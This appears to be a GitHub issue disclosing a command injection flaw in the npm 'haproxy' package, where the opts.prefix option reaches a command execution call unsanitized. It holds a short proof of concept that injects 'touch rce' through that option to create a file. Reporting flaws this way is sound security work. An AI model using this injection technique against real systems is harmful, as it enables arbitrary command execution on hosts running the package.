observing/haproxy

Potential command injection vulnerability in haproxy

Opened this issue · 0 comments

Hi,

We would like to report a potential security vulnerability.
The bug is introduced because the package-exported method fails to sanitize its opts.prefix parameter and lets it flow into a sensitive command execution API.

Here is the proof of concept.

const lib = require('haproxy');

// opts.prefix is not sanitized and flows straight into the command that is
// executed; a blank `which` leaves the injected prefix as the command.
var opts = {
  prefix: 'touch rce',
  which: ' '
};
var a = new lib(opts);
a.orchestrator.run(['haproxy'], () => {}); // a file named rce will be created

Please consider fixing it. Thanks!